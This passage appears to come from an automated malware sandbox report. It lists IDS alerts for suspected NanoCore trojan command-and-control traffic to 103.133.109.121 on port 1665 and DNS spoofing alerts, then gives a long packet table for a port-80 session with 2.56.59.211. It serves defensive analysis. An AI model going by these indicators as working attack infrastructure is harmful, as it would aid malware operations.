10/26/21-14:32:51.857034	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49167	1665	192.168.2.22	103.133.109.121
10/26/21-14:32:58.064655	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49168	1665	192.168.2.22	103.133.109.121
10/26/21-14:33:10.754621	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49169	1665	192.168.2.22	103.133.109.121
10/26/21-14:33:16.896073	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55616	8.8.8.8	192.168.2.22
10/26/21-14:33:17.220855	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49170	1665	192.168.2.22	103.133.109.121
10/26/21-14:33:23.148868	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	49972	8.8.8.8	192.168.2.22
10/26/21-14:33:23.506231	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49171	1665	192.168.2.22	103.133.109.121
10/26/21-14:33:41.021024	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/26/21-14:33:41.331307	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49173	1665	192.168.2.22	103.133.109.121
10/26/21-14:33:46.009612	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49174	1665	192.168.2.22	103.133.109.121
10/26/21-14:33:50.682297	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49175	1665	192.168.2.22	103.133.109.121
10/26/21-14:33:55.052700	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50072	8.8.8.8	192.168.2.22
10/26/21-14:33:55.382395	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49176	1665	192.168.2.22	103.133.109.121
10/26/21-14:34:14.738599	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49177	1665	192.168.2.22	103.133.109.121
10/26/21-14:34:19.468378	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49178	1665	192.168.2.22	103.133.109.121
10/26/21-14:34:24.111348	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49179	1665	192.168.2.22	103.133.109.121
10/26/21-14:34:28.776193	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49180	1665	192.168.2.22	103.133.109.121
10/26/21-14:34:33.840839	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49181	1665	192.168.2.22	103.133.109.121
10/26/21-14:34:38.459896	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49182	1665	192.168.2.22	103.133.109.121

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2021 14:32:28.399044037 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.425302982 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.425436974 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.425699949 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.453636885 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.454737902 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.454761982 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.454869032 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.454936981 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.454955101 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.454981089 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.454993010 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.454998970 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.455018044 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.455027103 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.455034971 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.455035925 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.455049992 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.455051899 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.455070019 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.455071926 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.455087900 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.455101967 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.464797974 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480618000 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480663061 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480690002 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480712891 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480730057 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480747938 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480751991 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480765104 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480781078 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480781078 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480784893 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480787992 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480798006 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480798960 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480817080 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480819941 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480837107 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480840921 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480854034 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480861902 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480871916 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480875969 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480889082 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480891943 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480907917 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480910063 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480925083 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480930090 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480942965 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480945110 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480959892 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480979919 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480982065 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480988026 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.480998039 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.480998039 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.481014967 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.481031895 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.482494116 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.506870985 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.506901026 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.506916046 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.506932974 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507008076 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507038116 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507366896 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507385015 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507422924 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507441044 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507452965 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507457018 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507467031 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507473946 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507479906 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507493019 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507500887 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507514000 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507517099 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507533073 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507544041 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507550001 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507550955 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507575989 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507584095 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507592916 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507602930 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507621050 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507635117 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507638931 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507654905 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507662058 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507663965 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507673979 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507683039 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507699013 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507711887 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507715940 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507729053 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507733107 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507749081 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507755995 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507762909 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507766962 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507777929 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507783890 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507798910 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507805109 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507805109 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507823944 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507827997 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507839918 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507850885 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507857084 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507858992 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507873058 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507882118 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507889986 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507889986 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507905960 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507914066 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507924080 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507929087 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507944107 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507951975 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507960081 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507961035 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.507983923 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.507997990 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.508080959 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.508439064 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.508455992 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.508470058 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.508486032 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.508503914 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.508522034 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.508526087 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.512697935 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.513850927 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.532891035 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.532917023 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.532933950 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.532952070 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.532968998 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.532984018 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.533027887 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.533060074 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.533144951 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.533163071 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.533180952 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.533195019 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.533198118 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.533205986 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.533215046 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.533231020 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.533237934 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.533245087 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.533248901 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.533272028 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534605980 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534800053 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534821987 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534840107 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534861088 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534862041 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534881115 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534881115 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534894943 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534898043 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534914017 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534917116 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534934044 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534934998 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534950018 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534951925 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534966946 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.534969091 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.534986973 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535007000 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535024881 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535042048 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535062075 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535073996 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535079956 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535079956 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535088062 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535090923 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535094023 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535096884 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535099030 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535103083 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535111904 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535128117 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535146952 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535154104 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535165071 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535186052 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535197020 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535209894 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535229921 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535237074 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535245895 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535257101 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535274029 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535274982 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535290003 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535294056 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535306931 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535311937 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535322905 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535326004 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535340071 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535341024 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535356045 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535361052 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535376072 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535376072 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535387993 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535393953 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535409927 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.535420895 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535434961 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.535446882 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.536488056 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.559319973 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559345961 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559365034 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559381962 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559398890 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559422016 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559493065 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.559524059 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.559741020 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559762955 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559782028 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559798956 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559815884 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.559819937 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559834957 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.559839010 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.559854031 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.559900045 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.560383081 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.563824892 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.563852072 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.563868999 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.563886881 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.563904047 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.563916922 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.563925028 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.563944101 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.563949108 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.563961983 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564269066 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564301014 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564318895 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564337969 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564363956 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564377069 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564388037 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564397097 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564399958 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564409971 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564418077 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564431906 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564450979 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564454079 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564469099 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564476013 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564496040 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564517021 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564538956 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564541101 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564551115 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564559937 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564569950 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564584017 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564594984 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564606905 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564620018 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564629078 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564647913 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564671993 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564671993 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564687014 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564697981 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564723015 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564726114 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564738035 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564745903 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564768076 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564769983 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564779997 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564790964 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564815044 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564815998 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564826012 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564837933 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564846039 CEST	49165	80	192.168.2.22	2.56.59.211
Oct 26, 2021 14:32:28.564861059 CEST	80	49165	2.56.59.211	192.168.2.22
Oct 26, 2021 14:32:28.564874887 CEST	49165	80	192.168.2.22	2.56.59.211
